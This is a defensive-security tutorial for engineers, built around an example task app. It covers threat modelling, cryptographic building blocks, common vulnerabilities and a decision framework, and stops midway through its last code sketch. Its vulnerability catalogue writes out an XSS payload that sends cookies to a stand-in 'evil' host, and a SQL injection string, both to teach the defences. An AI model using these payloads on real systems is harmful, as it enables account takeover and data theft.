Security from Zero to Hero — The Engineer's Guide to Thinking Like a Defender

Security is risk management, not paranoia. A practical roadmap covering the mental model, threat modelling, the building blocks (hashing, encryption, TLS, authentication, authorisation, secrets), the vulnerability catalogue (injection, XSS, CSRF, IDOR, SSRF), and a six-step decision framework you can run on every feature — anchored to one example app, TaskTrail.

Mahmoud Albelbeisi

A note before section 1

TaskTrail — a small task-management web app with a mobile companion. Users sign up with email and password, create personal task lists, share lists with team members, attach files to tasks, and receive email and push notifications. There is a web frontend, a backend API, a Postgres database, an object store for attachments, a small operations team, and a handful of third-party SDKs. We'll return to TaskTrail in every section so the reader watches one app's threat model grow and its defences harden as concepts stack. TaskTrail is not a payment app, not a healthcare app, not a messaging app — it is a normal everyday product, the kind most engineers actually ship.


1. The Mental Model — Security Is Risk Management

Security is the work of choosing which risks you accept and which you defend against, given finite engineering time. There is no such thing as "100% secure." Anyone who tells you otherwise is selling something.

Three numbers sit behind every decision:

  • Likelihood — how often this attack is tried, in your context.
  • Impact — how bad it is if the attack lands.
  • Cost of defence — engineering time plus drag on the product.

If the cost of defence is bigger than the loss it prevents, the defence is security theatre (a control that looks like security but does not measurably reduce risk). Take it out.

CIA — the three things you protect

The CIA triad (Confidentiality, Integrity, Availability — the three core security properties) is the shortest model in the field.

  • Confidentiality — only the right people see the data.
  • Integrity — the data has not been changed without authorisation.
  • Availability — the system answers when needed.

Most decisions are about which of these matters most for this asset. A bank's vault is mostly confidentiality + integrity. A 911 line is mostly availability. An audit log is mostly integrity. TaskTrail's task contents are confidentiality first, integrity second, availability third.

Think of it like… locks on a building. A vault keeps determined thieves out (confidentiality). Tamper-evident seals on packages prove nobody opened them (integrity). A 24-hour reception desk means someone is always there (availability). Different locks for different jobs.

In software, this looks like… TaskTrail encrypts attachments at rest (C), signs API responses with HMAC for integrity (I), and runs the API in two regions (A). Three properties, three controls.
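The integrity control above can be sketched with Python's standard-library `hmac` module. The key name and response framing here are illustrative, not TaskTrail's actual scheme:

```python
import hashlib
import hmac

SIGNING_KEY = b"server-side secret, never shipped to clients"  # illustrative key

def sign(body: bytes) -> str:
    """Return a hex HMAC-SHA256 tag for a response body."""
    return hmac.new(SIGNING_KEY, body, hashlib.sha256).hexdigest()

def verify(body: bytes, tag: str) -> bool:
    """compare_digest is constant-time, defeating timing attacks on the tag."""
    return hmac.compare_digest(sign(body), tag)
```

The server sends the tag alongside the body (for example in a header); any change to a single byte of the body makes `verify` return False.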

The myth: "the security team handles it"

The security team helps. They do not replace you. Every engineer ships security with every line of code. A senior security engineer can spot the missing authorisation check in your PR; they cannot rewrite every line of every product team's code.

"Security is not a feature you add. It is a property your design either has or fails to have."

Every concrete decision sits downstream of these inputs — likelihood, impact, cost of defence, and which CIA property dominates for the asset. Without them, you are guessing.


2. The Trade-Off Axes

Each axis is a slider, not a switch. Every push has a price.

Confidentiality vs availability

You can lock something so hard that legitimate users cannot reach it during a failure. TaskTrail could encrypt every attachment with a key from a separate key-server. If the key-server has an outage, attachments become unreadable — even to the rightful owners.

Security vs usability

Every prompt, every check, every step costs the user. Bad security UX creates bad security: people write down passwords, share MFA codes by SMS, click through warnings. One of the most effective phishing lures of recent years: "your MFA push expired — please approve again."

Strict vs flexible authorisation

Fine-grained access control (per-row, per-field) is safer but harder to operate. Coarse-grained (per-resource type) is easier to reason about but leaks more on a breach. Pick the level that matches the asset.

Cost (visible and invisible)

The password-reset queue is a security cost. Help-desk tickets are a security cost. Engineer hours retraining users on a new flow are a security cost. Real cost is rarely just the line of code.

Compliance vs engineering judgement

Sometimes regulators demand a control that is weaker than what you would design. Meet the rule. Then add the better thing on top. Compliance is a floor, not a ceiling.

| If you push toward… | You pay in… | A TaskTrail example |
| --- | --- | --- |
| Confidentiality | availability | encrypted attachments unreachable on key-server outage |
| Strong authentication | usability | passkey enrolment friction loses 5% of new sign-ups |
| Strict authorisation | operability | per-row checks complicate every read query |
| Visible defences | engineer hours | rate-limit + WAF + audit log all need maintenance |
| Compliance only | real safety | "we're SOC 2" does not mean "we're hard to breach" |

The pattern to take away: many "classic" controls (security questions, mandatory rotation) are theatre. Many cheap controls (passkeys, argon2, rate limiting) are real.

Don't confuse with… Compliance is "did we tick the boxes the auditor cares about?" Security is "are we actually protected?" The two overlap, but neither implies the other.


3. The Threat Model — Who, What, How

A threat model (a short written list of what you protect, who attacks, and how) is the shortest path from "we should do security" to a useful answer. Most engineers carry one in their head and never write it down. That is the bug.

Walk through TaskTrail's threat model with me. Four blocks: assets, attackers, attack surface, then the output table.

3.1 Assets — what attackers want

An asset (anything of value the attacker is after) for TaskTrail:

  • User credentials — email + password hashes; the keys to every other asset.
  • Session tokens — bearer access without the password.
  • Email-address list — gold for phishing the user base.
  • Private task contents — the user's actual data.
  • Attached files — sometimes the most sensitive content (NDAs, photos).
  • Employee admin credentials — one breach equals all-data access.
  • API keys to the email-sending vendor — outbound abuse and reputation damage.

Money, identity, the social graph, and access — the four things attackers generally want. TaskTrail holds all four in some form.

3.2 Attackers — named archetypes

A threat actor (any person or system trying to take an asset) is not a faceless hacker in a hoodie. It is one of these archetypes:

  • Opportunistic credential stuffer — runs leaked password lists against the login form. Not targeting you — targeting anyone. Massive scale, low effort.
  • Curious insider — engineer with database access browsing other people's tasks.
  • Targeted phisher — wants one specific user's account, willing to send a tailored email.
  • Compromised dependency — an npm package added to TaskTrail's frontend updates with malicious code that exfiltrates session cookies.
  • State-level adversary — almost certainly not TaskTrail's threat model. Naming this archetype lets you explicitly exclude it. You do not defend against everything — you defend against what fits the asset.

Don't confuse with… A threat is the possibility of an attack. A threat actor is who would do it. A vulnerability is a flaw that lets them succeed. Risk is likelihood × impact. Four words, four meanings.

3.3 Attack surface — every door in the house

The attack surface (every place untrusted input meets the system) is the door list. For TaskTrail:

  • The login form (and rate limiter).
  • The registration form.
  • The password reset flow.
  • Every API endpoint.
  • The file upload path.
  • The share-list link (publicly addressable).
  • Inbound email webhooks.
  • Third-party SDKs in the frontend and backend.
  • Mobile push registration (and the push topic).
  • The admin console.

Each entry is one door. Each door deserves one thought: who can knock, and what happens when they do?

3.4 The output — a one-page table

Quick preview: every column below — asset, attacker, attack, likelihood, impact, defence, residual risk — was defined in the paragraphs above.

This is the deliverable. One row per realistic attack:

| Asset | Attacker | Attack | Likelihood | Impact | Defence | Residual |
| --- | --- | --- | --- | --- | --- | --- |
| Credentials | Credential stuffer | Reuse leaked passwords on /login | High | High | argon2 + rate limit + MFA + breach-list check | A few users with reused passwords still vulnerable |
| Session token | Compromised npm package | Exfiltrate cookies to attacker domain | Medium | High | SRI on scripts; CSP; cookies HttpOnly+SameSite | New SDKs need a fresh review |
| Task contents | Curious insider | Run SELECT * FROM tasks | Medium | Medium | Least-privilege DB roles; audit log; alerts | An admin with read access still has read access |
| Attachments | Targeted phisher | Phish owner, then download | Medium | High | MFA on sensitive actions; download alerts | Phish-proof requires passkeys |

After this section, you should be able to fill one in for your own product.

Real situation: TaskTrail's first threat-model meeting fits on a single page. Two hours of arguing in a room. The output is the cheapest piece of paper the team will ever produce — every later decision lands faster because of it.


4. The Building Blocks

Cheat-sheet style. Each block follows the Examples Rule — definition, analogy, TaskTrail example, why it matters — plus Use it when / Skip it when / You pay, a Real situation, and a Common tools line.

4.1 Hashing

A hash function (a one-way function that maps any input to a fixed-size output) is used for integrity (proving a value has not changed) and for password hashing (storing passwords without storing the password itself).

Think of it like… running a document through a shredder that always produces the same pattern of confetti for the same document. You cannot reassemble the document, but two identical documents make identical confetti.

In software, this looks like… TaskTrail stores argon2(password + salt) in the users table. On login, it hashes the submitted password with the same salt and compares.

Generic hashes (SHA-256) are fast — good for integrity, bad for passwords. Password hashing uses slow, memory-hard algorithms on purpose: bcrypt, scrypt, argon2.

A salt (a random per-user value mixed into the password before hashing) defeats rainbow tables. A pepper (a global secret mixed in addition to the salt) defeats theft of the database alone — useful, never a substitute for proper hashing.

Don't confuse with… Hashing is irreversible. Encryption is reversible with the key. Encoding (Base64, URL-encoding) is just a representation — not security at all.

  • Use it when storing passwords, verifying file integrity, deduplicating content.
  • Skip it when you need to recover the original (use encryption).
  • You pay the slow-on-purpose cost (~100ms per login attempt).
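The mechanics, sketched with `hashlib.scrypt` from Python's standard library (argon2 itself needs a third-party package such as argon2-cffi; the cost parameters below are illustrative, not tuned — raise them until one hash takes ~100ms on your hardware):

```python
import hashlib
import hmac
import os

def hash_password(password, salt=None):
    """Memory-hard hash with a per-user random salt. Returns (salt, digest)."""
    salt = salt or os.urandom(16)            # 16 random bytes per user
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=2**14, r=8, p=1, dklen=32)
    return salt, digest

def verify_password(password, salt, expected):
    """Re-hash the candidate with the stored salt; compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)
```

On registration you store `(salt, digest)`; on login you call `verify_password` with the stored pair. The password itself is never stored.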

Real situation: LinkedIn 2012 stored 117M passwords as unsalted SHA-1. The dump leaked, and most were cracked within days. Argon2 + salt would have made the same dump nearly worthless.

Common tools: bcrypt (battle-tested default), argon2 (modern winner, recommended for new systems), scrypt (memory-hard alternative).

4.2 Symmetric encryption

Symmetric encryption (same key encrypts and decrypts) is the workhorse. The modern default is AES-GCM (AES with Galois/Counter Mode — encryption + tamper detection in one step). AEAD (Authenticated Encryption with Associated Data) is the property that matters: ciphertext that has been tampered with fails to decrypt.

Think of it like… a lockbox where the same key opens and closes it. Anyone with the key can read or write.

In software, this looks like… TaskTrail encrypts attachments at rest with AES-GCM. The data key is wrapped by a key-management service.

A nonce (a number used once) and an initialisation vector (IV) (a per-message random or counter value) must never repeat for the same key. Repeating them in AES-GCM is catastrophic.

  • Use it when you control both ends (data at rest, internal pipes).
  • Skip it when parties do not share a key (use asymmetric).
  • You pay key management — distributing, rotating, revoking.

Common tools: libsodium / NaCl (opinionated, hard to misuse), OpenSSL (ubiquitous, footgun-prone), language-native (Apple CryptoKit, Java JCA, Python cryptography, Go crypto/...).

4.3 Asymmetric encryption and digital signatures

Asymmetric encryption (one key encrypts, a different key decrypts — public + private) powers TLS, JWT signing, and code signing.

A digital signature (a value computed with the private key that anyone with the public key can verify) proves who sent something without hiding what they sent. Public Key Infrastructure (PKI) (the system of certificates and authorities that ties public keys to identities) is how the web trusts public keys.

Don't confuse with… Signing proves who. Encrypting hides what. The two are different goals; many protocols combine them.

Common tools: OpenSSL, libsodium, language-native crypto, Let's Encrypt (free certificate authority).

4.4 TLS — the green lock

Transport Layer Security (TLS) (the standard protocol that encrypts and authenticates network traffic) gives you three things: transport confidentiality, transport integrity, and server authentication. It does not give you anything about how the server handles the data after decrypting it.

Think of it like… a sealed envelope between two post offices that already trust each other's stamps. Inside the building, the letter is a normal piece of paper.

In software, this looks like… TaskTrail's API runs only over https://. Plaintext requests are refused at the edge.

Certificate pinning (refusing any TLS certificate the client was not built to trust) is an extra layer for high-value mobile apps. Trade-off: a forgotten rotation locks every user out.

Common tools: NGINX, Caddy (automatic HTTPS via Let's Encrypt), Cloudflare (edge TLS), AWS ACM (managed certificates), Let's Encrypt (free CA).

4.5 Authentication primitives

Authentication (authn) (proving who you are) uses one or more factors: something you know (password), something you have (phone, security key), something you are (biometric).

Multi-factor authentication (MFA) (requiring more than one factor) dramatically reduces account takeover. Two-factor authentication (2FA) is MFA with exactly two factors — the names are interchangeable in practice.

Ranked from worst to best:

  • SMS one-time-password — vulnerable to SIM swap (an attacker convinces the carrier to move the phone number to their SIM). Common, weakest.
  • TOTP (time-based one-time password) (a 6-digit code from an authenticator app, refreshing every 30 seconds) — phishable, but no SIM-swap risk.
  • Push approval — better UX, vulnerable to push-fatigue (user taps "approve" on the wrong prompt).
  • Hardware security key / WebAuthn / passkeys — phishing-resistant. The future.
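To demystify the TOTP entry above, here is a from-scratch sketch of the RFC 6238 algorithm — HMAC over a time counter, dynamically truncated to six digits. This is for understanding only; in production use a vetted implementation (for example pyotp):

```python
import hashlib
import hmac
import struct
import time

def totp(secret: bytes, for_time=None, step=30, digits=6) -> str:
    """RFC 6238: HMAC-SHA1 over the number of 30-second steps since epoch."""
    t = time.time() if for_time is None else for_time
    counter = struct.pack(">Q", int(t // step))          # 8-byte big-endian counter
    digest = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                           # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10**digits).zfill(digits)
```

Server and authenticator app share `secret`; each computes the code independently, so nothing travels over the network except the six digits the user types.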

Don't confuse with… Authentication is "who are you?". Authorisation is "what may you do?". Different questions, different answers, different code paths.

4.6 Authorisation models

Role-Based Access Control (RBAC) (permissions attached to roles; users get roles) is simple. Attribute-Based Access Control (ABAC) (decisions made on attributes — user, resource, time, context) is fine-grained but harder to operate.

TaskTrail's first version was RBAC: owner, member, admin. The third enterprise customer needed "view but not export" — that pushed it toward ABAC for the export-permission attribute.

4.7 Sessions and tokens

A session (server-side state that lets the client skip re-authentication for a while) is the simple safe default. The client holds a session id (in a cookie); the server holds the rest.

A token (a string that proves the bearer has permission) comes in three shapes:

  • access token — short-lived (minutes), used in every API call.
  • refresh token — long-lived, exchanged for new access tokens.
  • id_token — proves identity (used for sign-in).

A JSON Web Token (JWT) (a signed token containing claims) is one widely-used format. JWTs are stateless (great for scale) and irrevocable until expiry (terrible for "log out everywhere"). Pick the trade-off knowingly.

OAuth 2.0 (an authorisation protocol that issues short-lived tokens after a login) and OpenID Connect (OIDC) (a thin identity layer on top of OAuth 2.0) are the standards for third-party identity.

Don't confuse with… A cookie is a transport (browser-stored value sent with every request). A JWT is a format (signed claims). You can put a JWT in a cookie. You can put a session id in a cookie. They are not the same thing.

4.8 Secrets management

A secret (a value that grants access — API key, password, token, signing key) must never live in source control. Use a vault. Inject at boot via env var. Rotate on a schedule. Least-privilege the vault itself.
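The "inject at boot" step can be as small as this sketch — read the secret from the environment and crash loudly if it is missing, rather than limping along and failing somewhere less obvious (the variable name is hypothetical):

```python
import os

def require_secret(name: str) -> str:
    """Read a secret injected at boot via env var; fail fast if absent."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError(f"missing required secret: {name}")
    return value

# e.g. at startup:  EMAIL_API_KEY = require_secret("EMAIL_API_KEY")
```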

Real situation: Uber 2016 had AWS keys in a private GitHub repo. An attacker found them in a forked branch, downloaded data on 57 million users, and the company paid the attacker to keep quiet — adding a cover-up to the original mistake.

Common tools: HashiCorp Vault (open-source standard), AWS Secrets Manager, GCP Secret Manager, Doppler / Infisical (developer-friendly SaaS), 1Password Secrets Automation.

4.9 Logging and audit

What to log: who did what, when, from where, with what result. What not to log: passwords, tokens, full request bodies, personally identifiable information (PII) (names, emails, IDs that can be tied to a real person).

Audit logs are a security control: detection (you can see the breach) plus accountability (you know who did it). Send them somewhere the application cannot rewrite.

  • Use it when any change touches identity, money, or data classification.
  • Skip it when events are pure debug noise.
  • You pay storage and the discipline of redacting at the source.

Common tools: Datadog / New Relic (SaaS observability), ELK / OpenSearch (self-hosted), Loki (logs by Grafana Labs).

4.10 Backup and recovery

Availability lives here. Encrypted, offline copies; tested restores; a documented runbook. A backup you have not restored is a fairy tale.

4.11 Rate limiting and abuse prevention

Protects login, password reset, file upload, and any expensive operation. Per-IP, per-user, per-email — composed. CAPTCHAs are a last resort; they cost legitimate users.

Common tools: Cloudflare Rate Limiting, AWS WAF, application-level libraries.



5. The Vulnerability Catalogue

A teaching catalogue, not an exhaustive OWASP dump. For each: What it is, How attackers get in, How to defend (ranked from "the right fix" to "the band-aid"), with a real named case.

5.1 Injection (SQL, command, LDAP)

What it is. Injection (an attacker's input is mixed with code/queries on a trust boundary) — string concatenation across a trust boundary. The classic: "SELECT * FROM tasks WHERE title LIKE '" + input + "'".

How attackers get in. Submit input that closes the quote and adds a clause: ' OR 1=1 --. The query returns everything.

How to defend. Right fix: parameterised queries (the database treats input as data, never as code). Band-aid: input filtering — fragile and bypassable.

The same query, parameterised:

cur.execute("SELECT * FROM tasks WHERE title LIKE %s", (user_input,))
# user_input is bound as a value; the database never interprets it as SQL

Real situation: MOVEit 2023 (CVE-2023-34362) was a SQL-injection zero-day that led to mass data theft from hundreds of organisations.

5.2 Cross-Site Scripting (XSS)

What it is. XSS (Cross-Site Scripting) (attacker-controlled content is rendered as code in another user's browser) — the malicious page steals cookies or impersonates the user.

How attackers get in. A user pastes <script>fetch('//evil/?c='+document.cookie)</script> as a task title. Another user opens the list. Their browser runs the script.

How to defend. Right fix: contextual output encoding (the templating engine escapes < to &lt; automatically) plus a strict Content Security Policy (CSP) (an HTTP header that limits what scripts a page can run). Band-aid: input filtering — bypassable.

With CSP default-src 'self', the inline script does not run.
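The "contextual output encoding" half of the fix, sketched with Python's stdlib `html` module (real templating engines such as Jinja2 do this automatically; the list-item framing here is illustrative):

```python
import html

def render_task_title(title: str) -> str:
    """Escape for an HTML text-node context: whatever the user typed
    is displayed as text, never executed as markup or script."""
    return f"<li>{html.escape(title)}</li>"
```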

5.3 Cross-Site Request Forgery (CSRF)

What it is. CSRF (the user's browser is tricked into sending an authenticated request) — the user is logged in to TaskTrail; an attacker page submits a form that POSTs to TaskTrail; the cookie rides along.

How to defend. SameSite=Lax cookies (default in modern browsers) plus an anti-CSRF token (a per-session token the form must include) on state-changing requests.
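The token half of the defence, sketched with stdlib `secrets` (where the token is stored and how it reaches the form is framework-specific and omitted here):

```python
import hmac
import secrets

def issue_csrf_token() -> str:
    """Generated at session creation, kept server-side, embedded in every form."""
    return secrets.token_urlsafe(32)

def check_csrf(session_token: str, submitted: str) -> bool:
    """An attacker's page cannot read the token, so it cannot submit it."""
    return hmac.compare_digest(session_token, submitted)
```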

5.4 Broken access control / IDOR

What it is. Insecure Direct Object Reference (IDOR) (an endpoint returns or modifies an object based on a parameter without checking ownership). /api/tasks/42 returns task 42 even if it isn't yours.

How attackers get in. Log in. Increment IDs. Read other users' tasks.

How to defend. Authorise on every read, not just on routes. Check ownership at the row level, in the SQL query, every time.
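A minimal sketch of ownership-in-the-query, shown with sqlite3 for self-containment (TaskTrail itself runs Postgres; the schema is illustrative):

```python
import sqlite3

def get_task(db, task_id: int, current_user_id: int):
    """The ownership check lives in the SQL itself: a task you don't own
    is indistinguishable from a task that doesn't exist."""
    return db.execute(
        "SELECT id, title FROM tasks WHERE id = ? AND owner_id = ?",
        (task_id, current_user_id),
    ).fetchone()  # None -> respond 404, not 403 (don't confirm existence)
```

Returning 404 rather than 403 for other users' rows also avoids leaking which IDs exist.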

5.5 Server-Side Request Forgery (SSRF)

What it is. SSRF (the server is tricked into fetching an attacker-controlled URL) — usually pointed at internal-only services that trust the internal network.

Real situation: Capital One 2019 — an SSRF via a misconfigured WAF let an attacker reach an internal AWS metadata endpoint, steal credentials, and download data on 100 million customers.

How to defend. Allow-list outbound URLs at the application layer. Block requests to 169.254.169.254 (cloud metadata) and localhost. Use IMDSv2 on AWS.
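A sketch of the application-layer check, using stdlib `ipaddress` and `urllib.parse`. The allow-list entries are hypothetical, and a real defence must also resolve DNS and re-check the resulting IP (DNS rebinding); this sketch only inspects the URL itself:

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"api.github.com", "hooks.slack.com"}  # hypothetical allow-list

def outbound_url_allowed(url: str) -> bool:
    """Deny by default; explicitly refuse IP literals pointing at loopback,
    link-local (cloud metadata, 169.254.169.254), or private ranges."""
    host = urlsplit(url).hostname or ""
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_loopback or ip.is_link_local or ip.is_private:
            return False
    except ValueError:
        pass  # a hostname, not an IP literal
    return host in ALLOWED_HOSTS
```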

5.6 Broken authentication

What it is. Weak password rules, no rate limit on login, predictable session IDs, missing MFA on sensitive actions.

How to defend. argon2 + per-IP and per-account rate limit + MFA for sensitive actions + session IDs from a CSPRNG (cryptographically secure random number generator) + breach-list check at password set time.

5.7 Sensitive data exposure

What it is. Secrets in logs, PII in URLs (which end up in proxy logs, browser history, referer headers), passwords sent over plaintext, generic encryption-at-rest claims that do not actually protect against the threat.

How to defend. Redact at the source. TLS everywhere. Classify data; design controls per class.

5.8 Security misconfiguration

What it is. Default credentials, open S3 buckets, debug endpoints in production, verbose error messages.

Real situation: Year after year, "open S3 bucket" stories keep appearing. The defaults are now safer (private by default), but legacy buckets and bad re-enablements still cause regular breaches.

5.9 Vulnerable / outdated components & supply-chain attacks

What it is. Using a dependency with a known CVE (Common Vulnerabilities and Exposures) (a public catalogue of known security flaws, each with a unique id), or worse, a malicious dependency.

Real situation: SolarWinds 2020 — attackers compromised the Orion software build system; signed updates carried a backdoor to ~18,000 customers including US government agencies. The 2018 event-stream npm incident showed the same shape at smaller scale: a popular package handed off to a new maintainer, who inserted a credential stealer.

How to defend. Pin versions. Use Software Bill of Materials (SBOM) (a manifest of all dependencies and their versions). Run dependency scanners on every PR. Watch the NVD and GitHub Advisory Database.

Common tools: Dependabot (GitHub-native), Renovate (open-source, configurable), Snyk Open Source, OSV-Scanner (Google, free).

5.10 Insecure deserialisation

What it is. Feeding attacker-controlled bytes to a deserialiser that constructs objects (Java's ObjectInputStream, Python's pickle, .NET's BinaryFormatter). The wrong type can run code.

How to defend. Do not deserialise untrusted input. Use safe formats (JSON without polymorphic types).

5.11 Sensitive secret in source control

What it is. API keys, passwords, signing keys committed to git.

Real situation: Uber 2016 — AWS keys in a private GitHub repo accessed via a leaked engineer credential. 57M user records exfiltrated. The cover-up made it worse.

How to defend. Pre-commit secret scanners (git-secrets, gitleaks, trufflehog). A vault for runtime secrets. Rotate immediately when you find one — even after deletion, the value remains in git history forever.

Don't confuse with… A vulnerability is a flaw. A threat is the possibility of exploitation. A risk is likelihood × impact. An incident is what happens when the risk lands. A breach is an incident with confirmed data loss.


6. Security Postures — Archetypes for How Much Effort to Spend

"How much security is enough?" is the wrong question. Better: which posture (an overall stance about how much you trust the network, the device, and the user) fits this product, this stage, this market? Five postures cover most apps.

6.1 Minimum viable security

The shape: TLS, hashed passwords, parameterised queries, secrets out of source control, rate-limited login.

  • Wins when the product is early; the user's exposure is small.
  • Hurts when real money or real PII flows; users notice the gaps.
  • Real example: most early-stage SaaS until traction proves out.
  • TaskTrail stage: MVP with the first 1,000 users.
  • Common tools: TLS via Caddy or Cloudflare, argon2, Dependabot at the minimum.

6.2 Defence in depth

Defence in depth (layering multiple controls so any one failure does not breach the asset) — assume any one defence will fail. Add the next one anyway.

  • Wins when assets are valuable enough that one bug should not be the whole story.
  • Hurts when the team is too small to maintain layers without rotting them.
  • Real example: 1Password stacks Secret Key + master password + AEAD + audited E2EE backups. Cloudflare layers DDoS, WAF, rate-limit, and origin protection.
  • TaskTrail stage: once the first enterprise customer signs up.
  • Common tools: WAF + TLS + app-level authorisation + row-level checks + encrypted DB + audit log.

6.3 Zero trust

Zero trust (every request is suspect, even from inside the network) — identity-aware access at every hop, no "internal-only" implicit trust.

  • Wins when there are employees with access to production data; insiders are part of the model.
  • Hurts when the team has no identity infrastructure yet.
  • Real example: Google's BeyondCorp is the canonical write-up; modern cloud-native shops follow the pattern.
  • TaskTrail stage: once there is an admin console with employee access to user data.
  • Common tools: identity provider (Auth0, Okta, Keycloak), mTLS between services, short-lived credentials.

6.4 Compliance-driven

The shape: meet the controls and audits regulators demand — GDPR, SOC 2, PCI DSS, HIPAA.

  • Wins when you sell to regulated buyers; without the badge, you cannot close the deal.
  • Hurts when the team treats the floor as the ceiling.
  • Real example: every SaaS with an enterprise sales motion.
  • TaskTrail stage: when sales starts mentioning SOC 2 in pre-sales calls.

GDPR (one paragraph): if you serve EU users, you process personal data lawfully, minimally, and let users see and delete their data. Privacy-by-design changes engineering choices: every database column for PII gets a deletion plan.

SOC 2 (one paragraph): a US-origin attestation report on operational controls. Useful for B2B sales. Does not directly improve security; the operational discipline that produces it sometimes does.

PCI DSS (one paragraph): if you touch card-holder data. Most teams reduce scope by routing payments through a vendor (Stripe, Adyen) so card numbers never touch their systems.

HIPAA (one paragraph): if you handle US health data. Strict rules on who can access PHI, audit logging, and breach notification.

6.5 End-to-end encryption (E2EE)

E2EE (End-to-End Encryption) (only the sender's and recipient's devices can read content; the server only sees ciphertext) — the server is part of the threat model.

  • Wins when content secrecy matters more than features.
  • Hurts when you need search, server-side rules, or recovery — all become hard or impossible.
  • Real example: Signal, WhatsApp (Signal Protocol since 2016), iMessage.
  • TaskTrail stage: probably never. E2EE is wrong for collaborative editing; the recovery story is brutal.

For TaskTrail, defence in depth dominates. E2EE is wrong for the use case. Compliance comes when sales demands it.


7. The Decision Framework

The repeatable procedure. Run it every time you design or review a feature. Six steps, because six fits in the head.

  1. Name the asset. What is being protected? (Credentials, private content, attachments, share tokens.)
  2. Name the attackers. Pick from the archetypes in § 3.
  3. Map the attack surface. What inputs and channels does this feature add?
  4. Pick the dominant risk. The one that ends the product (not just the feature).
  5. Choose the smallest defence that closes it. Reach for known primitives first. If you are inventing crypto, you are doing it wrong.
  6. Decide what residual risk you accept. Write it down. Revisit when the model changes.

Worked example: TaskTrail's Share a List

The product asks: a user shares a list. The recipient gets a link. The recipient may not have an account.

  1. Asset. The shared list's contents and the share token itself.
  2. Attackers. Opportunistic: someone guesses or scrapes share links. Targeted: a phisher tricks a recipient. Insider: an employee opens the share log.
  3. Attack surface. A new public endpoint (the share URL); a new email going out; a new database row (the share row).
  4. Dominant risk. A guessable or leaked share link grants list access without authentication.
  5. Smallest defence that closes it.
    • Share tokens are 256-bit random (cryptographically unguessable).
    • Tokens are single-use or time-limited (7 days).
    • Tokens are revocable from the owner's UI.
    • The token rides in the URL fragment (#), not the path — fragments are never sent in HTTP requests, so they stay out of server and referer logs; the frontend reads the fragment and submits the token to the API.
    • Server validates: token recognised, not revoked, not expired.
    • Recipient sees a read-only scoped view. No edits without sign-in.
  6. Residual risk we accept.
    • A recipient can copy the contents. The share is not a DRM system.
    • A recipient who forwards the link gives access to whoever they forward to. We accept this; we surface "n people accessed this link" to the owner.
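The token side of step 5 can be sketched with stdlib `secrets`. Storing only a hash of the token is one reasonable design (the same logic as password storage — a leaked database then doesn't leak live share links), not necessarily TaskTrail's exact scheme:

```python
import hashlib
import hmac
import secrets

def new_share_token():
    """256 bits from a CSPRNG -> unguessable by construction.
    Returns (token for the URL, hash to store in the share row)."""
    token = secrets.token_urlsafe(32)                    # 32 bytes = 256 bits
    stored = hashlib.sha256(token.encode()).hexdigest()  # fast hash is fine: token is high-entropy
    return token, stored

def token_matches(presented: str, stored: str) -> bool:
    candidate = hashlib.sha256(presented.encode()).hexdigest()
    return hmac.compare_digest(candidate, stored)
```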

The framework forces one decision: 256-bit single-use revocable tokens. It explicitly leaves another: forwarding. We are not in the DRM business.

"The framework's job is not to eliminate risk. It is to make every accepted risk a written, deliberate one."


8. Three More Worked Examples

8.1 Login flow

Registration: argon2id with sensible parameters; a breach-list check (HaveIBeenPwned k-anonymity API or local list). Login: per-IP and per-account rate limit; argon2 compare; session cookie with HttpOnly; Secure; SameSite=Lax. Sensitive actions (delete account, change email, export data): MFA prompt even if the session is fresh.

What the framework forces: MFA enrolment is friction; do not gate every login on it. Gate on risk — new device, new IP geolocation, sensitive action.
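The per-IP and per-account rate limit above can be sketched as a sliding-window counter; the key is whatever you compose (IP, account, or both). In-memory state like this is a single-process sketch — a real deployment typically backs it with Redis or the edge:

```python
import time
from collections import defaultdict, deque

class RateLimiter:
    """At most `limit` events per `window` seconds, per key."""

    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self.events = defaultdict(deque)   # key -> timestamps inside the window

    def allow(self, key, now=None) -> bool:
        now = time.monotonic() if now is None else now
        q = self.events[key]
        while q and now - q[0] >= self.window:
            q.popleft()                    # forget events that aged out
        if len(q) >= self.limit:
            return False                   # refused attempts are not recorded
        q.append(now)
        return True
```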

8.2 File upload (TaskTrail attachments)

Threats: malware, oversize files, MIME-type spoofing, path traversal (attacker uses ../ in a filename to escape the upload directory), SSRF if URLs are followed.

Defences: virus scan in a sandbox; content-type and size limits on the way in; randomised stored filenames (never the user-supplied name on disk); strict allow-list of accepted MIME types; serve attachments from a separate domain so a malicious file cannot read TaskTrail's cookies.
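The filename defences can be sketched together — strip any path the user supplied, allow-list the extension, and store under a random name. The extension set is illustrative:

```python
import os
import secrets

ALLOWED_EXTENSIONS = {".png", ".jpg", ".pdf", ".txt"}  # illustrative allow-list

def stored_name(user_filename: str) -> str:
    """Never trust the user's name: drop any directory components,
    allow-list the extension, and return a random on-disk name so
    '../../etc/passwd' or 'shell.php' can do nothing."""
    base = os.path.basename(user_filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"file type not allowed: {ext or '(none)'}")
    return secrets.token_hex(16) + ext
```

The user-supplied name can still be kept as display metadata in the database; it just never touches the filesystem.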

8.3 API endpoint with auth

Shape: GET /api/tasks/{id}. Threats: IDOR (no ownership check), mass assignment ({"role": "admin"} accepted by an auto-binder), missing rate limit, verbose errors leaking schema.

Defences: row-level authorisation; explicit allow-list of fields (DTO with explicit schema); rate limit per user; generic error messages.

Don't confuse with… Authentication answers who. Authorisation answers what may you do. The login check is authn; the ownership check is authz. Different bugs, different fixes.
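Both defences — the row-level ownership check and the explicit field allow-list — can be seen in one update handler. The model and function names here are hypothetical:

```python
# Sketch: IDOR defence (ownership check) + mass-assignment defence (allow-list).
from dataclasses import dataclass

@dataclass
class Task:
    id: int
    owner_id: int
    title: str
    role: str = "user"  # the kind of field an auto-binder would happily overwrite

# Mass-assignment defence: only these fields may come from the request body.
UPDATABLE_FIELDS = {"title"}

def update_task(task: Task, current_user_id: int, body: dict) -> Task:
    # IDOR defence: ownership check, not just "is logged in" (authz, not authn).
    if task.owner_id != current_user_id:
        raise PermissionError("not your task")
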